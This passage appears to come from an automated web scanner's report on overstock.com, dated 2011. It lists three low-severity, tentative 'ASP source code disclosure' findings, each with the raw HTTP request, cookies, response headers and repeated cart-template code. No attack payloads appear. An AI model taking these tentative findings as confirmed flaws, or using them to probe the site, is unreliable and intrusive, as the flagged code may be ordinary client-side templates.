<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.7. http://www.overstock.com/Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Bella-Chaise-Dark-Brown/4068266/product.html?IID=prod4068266&sec_iid=74074 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:47 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:47 GMT
Pragma: no-cache
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/|mxcclickele^74074; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4068266|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:47 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 129619

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.8. http://www.overstock.com/Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Black-Linen-Slipper-Chair-with-Signature-Pillow/5203264/product.html?TID=R:A2_6 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:42 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5203264|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:42 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:42 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120204

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.9. http://www.overstock.com/Home-Garden/Chairs/2737/subcat.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Chairs/2737/subcat.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Chairs/2737/subcat.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Chairs/2737/subcat.html|searchhistory^categories; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 247876

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
